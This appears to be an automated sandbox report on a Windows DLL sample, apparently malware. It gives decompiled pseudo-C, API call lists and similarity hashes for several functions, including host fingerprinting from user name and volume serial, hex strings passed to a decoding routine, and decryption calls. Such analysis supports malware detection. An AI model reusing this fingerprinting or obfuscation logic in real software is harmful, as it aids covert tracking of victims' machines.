                                                                                                                                                  0x67708b2f
                                                                                                                                                  0x67708b34
                                                                                                                                                  0x67708b34
                                                                                                                                                  0x67708b1e
                                                                                                                                                  0x67708b49
                                                                                                                                                  0x67708b8c
                                                                                                                                                  0x67708b8c
                                                                                                                                                  0x67708b8f
                                                                                                                                                  0x67708b96
                                                                                                                                                  0x67708b9b
                                                                                                                                                  0x67708ba0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708b4b
                                                                                                                                                  0x67708b5b
                                                                                                                                                  0x67708b77
                                                                                                                                                  0x67708b7a
                                                                                                                                                  0x67708b81
                                                                                                                                                  0x67708b86
                                                                                                                                                  0x67708b8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708b8b
                                                                                                                                                  0x67708b64
                                                                                                                                                  0x67708b6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67708b6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _set_error_mode.LIBCMT ref: 67708A31
                                                                                                                                                  • _set_error_mode.LIBCMT ref: 67708A42
                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 67708AA4
                                                                                                                                                    • Part of subcall function 677091B0: GetCurrentProcess.KERNEL32(?,?,?,?,67709252), ref: 677091C8
                                                                                                                                                  • GetStdHandle.KERNEL32 ref: 67708BB9
                                                                                                                                                  • WriteFile.KERNEL32 ref: 67708C16
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                  • API String ID: 2183313154-4022980321
                                                                                                                                                  • Opcode ID: 4d8daa1b1191d17b3597ada0e8fe9c24940c04346a2db8a9a65203ffa1fbac93
                                                                                                                                                  • Instruction ID: 6b367e707167b670d01d4af7af8afe9525524b7798cfec84bc134da4995bdf27
                                                                                                                                                  • Opcode Fuzzy Hash: 4d8daa1b1191d17b3597ada0e8fe9c24940c04346a2db8a9a65203ffa1fbac93
                                                                                                                                                  • Instruction Fuzzy Hash: D25122B131878086EB24CB25AA1875B33E6FB9E788F944526DF5E43B48DF39C215C705
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67706F80, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlCaptureContext.KERNEL32 ref: 6770839B
                                                                                                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 677083BA
                                                                                                                                                  • RtlVirtualUnwind.KERNEL32 ref: 67708406
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,67709197), ref: 67708478
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,67709197), ref: 67708490
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,67709197), ref: 6770849D
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,67709197), ref: 677084B6
                                                                                                                                                  • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,67709197), ref: 677084C4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                  • String ID: tqg
                                                                                                                                                  • API String ID: 3778485334-930876642
                                                                                                                                                  • Opcode ID: cc61ee2ff94c3806a90ee78d24a74539acc7892a67b17402bb2b1a6294ba840b
                                                                                                                                                  • Instruction ID: 87d487804597214e1d4de6a2f264ca4e9f96f9aebb58ba2e18578a196ae1f253
                                                                                                                                                  • Opcode Fuzzy Hash: cc61ee2ff94c3806a90ee78d24a74539acc7892a67b17402bb2b1a6294ba840b
                                                                                                                                                  • Instruction Fuzzy Hash: 2C31477520CB40C9EB509B54F89434A77B6F789398FC40126DA8D83764EF7EC1A8CB50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770334C, Relevance: 10.6, APIs: 7, Instructions: 95stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E6770334C(void* __ecx, void* __edi, void* __esp, long long __rbx, long long __rdi, long long __rsi, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v728;
				char _v872;
				char _v884;
				char _v888;
				signed int _v896;
				long long _v904;
				long long _v912;
				long long _v920;
				void* _t49;
				void* _t59;
				signed long long _t61;
				signed long long _t62;
				void* _t91;
				long long _t93;
				void* _t105;
				void* _t106;
				void* _t114;

				_t109 = __r8;
				_t64 = __rbx;
				_t58 = __esp;
				_t57 = __edi;
				_t49 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t61 =  *0x67716000; // 0x9b7b11e8241
				_t62 = _t61 ^ _t106 - 0x000003b0;
				_v24 = _t62;
				E67703938(0xb, __esp, _t62, __rbx, 0x67712e40, __rsi, __r8);
				E677044F8(_t49, 0xb, __edi, __esp, _t59, _t62, _t64, _t62, _t91, __rsi, _t105);
				E677039E8(__edi, __esp, _t62, _t62, _t62, _t62);
				r12d = 0x104;
				malloc(??);
				lstrcpyA(??, ??);
				free(??);
				_t5 =  &_v884; // 0x148
				_t93 = _t5;
				_v884 = 0x2b8;
				GetUserNameW(??, ??);
				lstrlenW(??);
				_t9 =  &_v728; // 0x1e4
				E67703938(_t62 + _t62, __esp, _t62, _t62, _t9, _t62, _t109);
				E67703A1C(_t59, _t62, _t62, _t62);
				_t66 = _t62;
				E677039E8(_t57, __esp, _t62, _t62, _t62, _t62);
				r9d = 4;
				E67707680(_t62, _t62, _t93,  *((intOrPtr*)(_t62 + 8)) + 0x10, _t114);
				E677039E8(_t57, __esp, _t62, _t62, _t62, _t62);
				_t12 =  &_v888; // 0x144
				_v896 = 0;
				_v904 = _t93;
				_v912 = _t93;
				r8d = 0;
				_v920 = _t93;
				GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??);
				r8d = _v888;
				_t18 =  &_v872; // 0x154
				wsprintfA(??, ??);
				asm("repne scasb");
				_t21 =  &_v872; // 0x154
				E67703938(0, __esp, _t62, _t62, _t21, _t62,  *((intOrPtr*)(_t62 + 8)) + 0x10);
				E67703A1C(_t59, _t66, _t62, _t62);
				E677039E8(_t57, _t58, _t62, _t62, _t62, _t62);
				r9d = 4;
				E67707680(_t62, _t62,  !(_t18 | 0xffffffff) - 1,  *((intOrPtr*)(_t62 + 8)) + 0x10, _t12);
				E677039E8(_t57, _t58, _t62, _t62, _t62, _t62);
				return E67706F80(0, _v24 ^ _t106 - 0x000003b0);
			}






















                                                                                                                                                  0x6770334c
                                                                                                                                                  0x6770334c
                                                                                                                                                  0x6770334c
                                                                                                                                                  0x6770334c
                                                                                                                                                  0x6770334c
                                                                                                                                                  0x6770334c
                                                                                                                                                  0x67703351
                                                                                                                                                  0x67703356
                                                                                                                                                  0x67703364
                                                                                                                                                  0x6770336b
                                                                                                                                                  0x6770336e
                                                                                                                                                  0x67703382
                                                                                                                                                  0x6770338d
                                                                                                                                                  0x67703398
                                                                                                                                                  0x6770339d
                                                                                                                                                  0x677033a6
                                                                                                                                                  0x677033b4
                                                                                                                                                  0x677033bd
                                                                                                                                                  0x677033c2
                                                                                                                                                  0x677033c2
                                                                                                                                                  0x677033cf
                                                                                                                                                  0x677033d7
                                                                                                                                                  0x677033e5
                                                                                                                                                  0x677033eb
                                                                                                                                                  0x677033f6
                                                                                                                                                  0x67703401
                                                                                                                                                  0x67703409
                                                                                                                                                  0x6770340c
                                                                                                                                                  0x67703415
                                                                                                                                                  0x67703425
                                                                                                                                                  0x6770342d
                                                                                                                                                  0x67703434
                                                                                                                                                  0x67703439
                                                                                                                                                  0x6770343d
                                                                                                                                                  0x67703442
                                                                                                                                                  0x67703447
                                                                                                                                                  0x6770344c
                                                                                                                                                  0x67703451
                                                                                                                                                  0x67703457
                                                                                                                                                  0x67703463
                                                                                                                                                  0x67703468
                                                                                                                                                  0x67703479
                                                                                                                                                  0x67703482
                                                                                                                                                  0x67703487
                                                                                                                                                  0x67703492
                                                                                                                                                  0x6770349d
                                                                                                                                                  0x677034a6
                                                                                                                                                  0x677034b6
                                                                                                                                                  0x677034be
                                                                                                                                                  0x677034ef

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • malloc.LIBCMT ref: 677033A6
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 677033B4
                                                                                                                                                  • free.LIBCMT ref: 677033BD
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 677033D7
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 677033E5
                                                                                                                                                    • Part of subcall function 67703A1C: CryptCreateHash.ADVAPI32 ref: 67703A62
                                                                                                                                                    • Part of subcall function 67703A1C: CryptHashData.ADVAPI32 ref: 67703A76
                                                                                                                                                    • Part of subcall function 67703A1C: CryptGetHashParam.ADVAPI32 ref: 67703A99
                                                                                                                                                    • Part of subcall function 67703A1C: lstrcpyA.KERNEL32 ref: 67703AB5
                                                                                                                                                    • Part of subcall function 67703A1C: free.LIBCMT ref: 67703AC3
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ACB
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ADB
                                                                                                                                                    • Part of subcall function 67703A1C: CryptDestroyHash.ADVAPI32 ref: 67703B2C
                                                                                                                                                  • GetVolumeInformationW.KERNEL32 ref: 67703451
                                                                                                                                                  • wsprintfA.USER32 ref: 67703468
                                                                                                                                                    • Part of subcall function 67707680: _errno.LIBCMT ref: 677076B7
                                                                                                                                                    • Part of subcall function 67707680: _invalid_parameter_noinfo.LIBCMT ref: 677076C3
                                                                                                                                                    • Part of subcall function 67707680: _errno.LIBCMT ref: 67707746
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$CryptHash$freemalloc$Heaplstrcpy$AllocateCreateDataDestroyErrorFreeInformationLastNameParamUserVolume_callnewh_invalid_parameter_noinfolstrlenwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1561055329-0
                                                                                                                                                  • Opcode ID: 804f39dafec5d627b20e419d21890cadecf736be83d2f0c5fa0c221d452a9d5d
                                                                                                                                                  • Instruction ID: ed1ec6bf25e01274f142f46610224583f263cd96c7f6bbd942524dde636cafb3
                                                                                                                                                  • Opcode Fuzzy Hash: 804f39dafec5d627b20e419d21890cadecf736be83d2f0c5fa0c221d452a9d5d
                                                                                                                                                  • Instruction Fuzzy Hash: 51317BA1318AC181DE14CB62E51879EB3A1F789BDCF844126EB8E5BB58DF3DC505C740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67709064, Relevance: 9.1, APIs: 6, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E67709064(signed int __ecx, signed int __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t37;
				int _t39;
				signed int _t44;
				signed int _t46;
				intOrPtr _t50;
				int _t51;
				signed int _t52;
				signed long long _t59;
				long long _t61;
				void* _t76;
				void* _t84;
				void* _t86;
				signed long long _t87;
				void* _t89;

				_t89 = __r8;
				_t76 = __rdx;
				_t45 = __ecx;
				 *((long long*)(_t86 + 0x10)) = __rbx;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				_t84 = _t86 - 0x4f0;
				_t87 = _t86 - 0x5f0;
				_t59 =  *0x67716000; // 0x9b7b11e8241
				 *(_t84 + 0x4e0) = _t59 ^ _t87;
				_t50 = r8d;
				_t52 = __edx;
				_t44 = __ecx;
				if(__ecx != 0xffffffff) {
					_t37 = E6770CD9C(_t37);
				}
				 *(_t87 + 0x70) =  *(_t87 + 0x70) & 0x00000000;
				r8d = 0x94;
				E67709420(_t37, _t45, 0, _t87 + 0x74, _t76, _t89);
				_t61 = _t84 + 0x10;
				 *((long long*)(_t87 + 0x48)) = _t87 + 0x70;
				 *((long long*)(_t87 + 0x50)) = _t61;
				__imp__RtlCaptureContext();
				r8d = 0;
				L6771049E();
				if(_t61 == 0) {
					 *((long long*)(_t84 + 0x108)) =  *((intOrPtr*)(_t84 + 0x508));
					 *((long long*)(_t84 + 0xa8)) = _t84 + 0x508;
				} else {
					 *(_t87 + 0x38) =  *(_t87 + 0x38) & 0x00000000;
					 *((long long*)(_t87 + 0x30)) = _t87 + 0x60;
					 *((long long*)(_t87 + 0x28)) = _t87 + 0x58;
					 *((long long*)(_t87 + 0x20)) = _t84 + 0x10;
					L67710498();
				}
				 *(_t87 + 0x70) = _t52;
				 *((intOrPtr*)(_t87 + 0x74)) = _t50;
				 *((long long*)(_t84 - 0x80)) =  *((intOrPtr*)(_t84 + 0x508));
				_t39 = IsDebuggerPresent();
				_t46 = 0;
				_t51 = _t39;
				SetUnhandledExceptionFilter(??);
				if(UnhandledExceptionFilter(??) == 0 && _t51 == 0 && _t44 != 0xffffffff) {
					_t46 = _t44;
					E6770CD9C(_t41);
				}
				return E67706F80(_t46,  *(_t84 + 0x4e0) ^ _t87);
			}

















                                                                                                                                                  0x67709064
                                                                                                                                                  0x67709064
                                                                                                                                                  0x67709064
                                                                                                                                                  0x67709064
                                                                                                                                                  0x67709069
                                                                                                                                                  0x67709072
                                                                                                                                                  0x6770907a
                                                                                                                                                  0x67709081
                                                                                                                                                  0x6770908b
                                                                                                                                                  0x67709092
                                                                                                                                                  0x67709095
                                                                                                                                                  0x67709097
                                                                                                                                                  0x6770909c
                                                                                                                                                  0x6770909e
                                                                                                                                                  0x6770909e
                                                                                                                                                  0x677090a3
                                                                                                                                                  0x677090af
                                                                                                                                                  0x677090b5
                                                                                                                                                  0x677090bf
                                                                                                                                                  0x677090c7
                                                                                                                                                  0x677090cc
                                                                                                                                                  0x677090d1
                                                                                                                                                  0x677090e6
                                                                                                                                                  0x677090e9
                                                                                                                                                  0x677090f1
                                                                                                                                                  0x67709131
                                                                                                                                                  0x6770913f
                                                                                                                                                  0x677090f3
                                                                                                                                                  0x677090f3
                                                                                                                                                  0x67709103
                                                                                                                                                  0x67709110
                                                                                                                                                  0x6770911c
                                                                                                                                                  0x67709123
                                                                                                                                                  0x67709123
                                                                                                                                                  0x6770914d
                                                                                                                                                  0x67709151
                                                                                                                                                  0x67709155
                                                                                                                                                  0x67709159
                                                                                                                                                  0x6770915f
                                                                                                                                                  0x67709161
                                                                                                                                                  0x67709163
                                                                                                                                                  0x67709176
                                                                                                                                                  0x67709181
                                                                                                                                                  0x67709183
                                                                                                                                                  0x67709183
                                                                                                                                                  0x677091ae

                                                                                                                                                  APIs
                                                                                                                                                  • RtlCaptureContext.KERNEL32 ref: 677090D1
                                                                                                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 677090E9
                                                                                                                                                  • RtlVirtualUnwind.KERNEL32 ref: 67709123
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 67709159
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 67709163
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 6770916E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                  • Opcode ID: fec9388cef76f1d931893aaa1ee8bc324f53a17d1504fb142639e27989d0d453
                                                                                                                                                  • Instruction ID: 76522d3d57f9d8a647f9cda36e1cce002ae67717d1503c412506964770cb2ada
                                                                                                                                                  • Opcode Fuzzy Hash: fec9388cef76f1d931893aaa1ee8bc324f53a17d1504fb142639e27989d0d453
                                                                                                                                                  • Instruction Fuzzy Hash: 3E31CF72218F818ADB20CF25E84479E73A4F799798F94062AEB9D47B58EF38C155CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704688, Relevance: 9.1, APIs: 6, Instructions: 73encryptionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$DecryptDestroyImportfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4252739240-0
                                                                                                                                                  • Opcode ID: c7ba5b66686a854d4bdfd466fecb391271d96addf60aa956fdb1e1b48d8d6624
                                                                                                                                                  • Instruction ID: 742f497218d0f2d6ff5d2b4f9b6b2e790b3c42a5452f113a5da63d68e51fec9e
                                                                                                                                                  • Opcode Fuzzy Hash: c7ba5b66686a854d4bdfd466fecb391271d96addf60aa956fdb1e1b48d8d6624
                                                                                                                                                  • Instruction Fuzzy Hash: 5E219672B04A6089E710CB62E844B9E7BB4F78CB8CF948025EE4D57B18EF38C585CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770CCE8, Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6770CCE8(void* __eax, long long __rbx, signed long long _a8, long long _a24) {
				signed long long _t7;

				_a24 = __rbx;
				_t7 =  *0x67716000; // 0x9b7b11e8241
				_a8 = _a8 & 0x00000000;
				if (_t7 == 0x2ddfa232) goto 0x6770cd1a;
				 *0x67716008 =  !_t7;
				return __eax;
			}




                                                                                                                                                  0x6770cce8
                                                                                                                                                  0x6770ccf2
                                                                                                                                                  0x6770ccf9
                                                                                                                                                  0x6770cd0c
                                                                                                                                                  0x6770cd11
                                                                                                                                                  0x6770cd9a

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 6770CD1F
                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6770CD2A
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6770CD36
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 6770CD42
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32 ref: 6770CD53
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1445889803-0
                                                                                                                                                  • Opcode ID: 7e29fd54ff1efd1a14bfb18da0496bd7cb26df0d762e700a165cf8f073adacc3
                                                                                                                                                  • Instruction ID: 0b14a276949b643d579e8e452021ca60e4ae33ad33d96ab5a9af1fd4a04078d8
                                                                                                                                                  • Opcode Fuzzy Hash: 7e29fd54ff1efd1a14bfb18da0496bd7cb26df0d762e700a165cf8f073adacc3
                                                                                                                                                  • Instruction Fuzzy Hash: 95018C3122DB0082EB40CF21F9407456361F75ABD5F896620EE5E8BBA4DE3DCAA58300
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770532C, Relevance: 7.5, APIs: 5, Instructions: 31encryptionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • malloc.LIBCMT ref: 67705342
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • malloc.LIBCMT ref: 6770534C
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 67707074
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707079
                                                                                                                                                  • CryptGenRandom.ADVAPI32(?,?,00000000,67704A26,?,?,?,6770147B), ref: 67705366
                                                                                                                                                  • free.LIBCMT ref: 67705373
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • free.LIBCMT ref: 6770537B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap_callnewhfreemalloc$AllocateCryptErrorFreeLastRandom
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2197550039-0
                                                                                                                                                  • Opcode ID: e74411e65b935c70d9d0b856edbb469612d4d43dfcf035389c3902853c32e792
                                                                                                                                                  • Instruction ID: 5c14230a92c7b74b071e2a695b3567d2ef883ad19725a0cfdd70ab47ca9e43e1
                                                                                                                                                  • Opcode Fuzzy Hash: e74411e65b935c70d9d0b856edbb469612d4d43dfcf035389c3902853c32e792
                                                                                                                                                  • Instruction Fuzzy Hash: B4F09AB17187808ADB448B16B69432EA6E1A78CBCCF448038EB4D87B08EF34C5A18700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770F0B4, Relevance: 107.7, APIs: 86, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1012874770-0
                                                                                                                                                  • Opcode ID: c1246a8779be43c34a7df71466692ecb4b25ceec148b14ccbab50eb288f450e1
                                                                                                                                                  • Instruction ID: 8edee910519d331b5196538d0e748627989b6c8787298883e31cd5919b9e8acd
                                                                                                                                                  • Opcode Fuzzy Hash: c1246a8779be43c34a7df71466692ecb4b25ceec148b14ccbab50eb288f450e1
                                                                                                                                                  • Instruction Fuzzy Hash: 4D8155F22215448ADF41DB31D9B82AD1361EBCCF4CF846132EB4DCB528DF10DA858392
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704F00, Relevance: 54.2, APIs: 4, Strings: 32, Instructions: 161stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E67704F00(void* __edi, void* __esp, void* __eflags, signed int* __rbx, unsigned long long __rdx, long long __rdi, long long __rsi) {
				void* __rbp;
				CHAR* _t98;
				signed int _t99;
				long long _t112;
				signed long long _t115;
				intOrPtr* _t118;
				unsigned long long _t164;
				intOrPtr _t168;
				void* _t173;
				long long* _t174;
				long long _t176;
				void* _t177;
				void* _t179;

				_t164 = __rdx;
				_t117 = __rbx;
				_t112 = _t176;
				 *(_t112 + 8) = __rbx;
				 *((long long*)(_t112 + 0x10)) = __rsi;
				 *((long long*)(_t112 + 0x18)) = __rdi;
				_t174 = _t112 - 0x48;
				_t177 = _t176 - 0x140;
				E67701000(__rbx, "b848708ebc87", __rdx, _t179);
				 *((long long*)(_t177 + 0x20)) = _t112;
				E67701000(_t117, "b85763", _t164, _t179);
				 *((long long*)(_t177 + 0x28)) = _t112;
				E67701000(_t117, "ba466995ae82c0d03a4c3f", _t164, _t179);
				 *((long long*)(_t177 + 0x30)) = _t112;
				E67701000(_t117, "bb467086", _t164, _t179);
				 *((long long*)(_t177 + 0x38)) = _t112;
				E67701000(_t117, "bc5d7097ae", _t164, _t179);
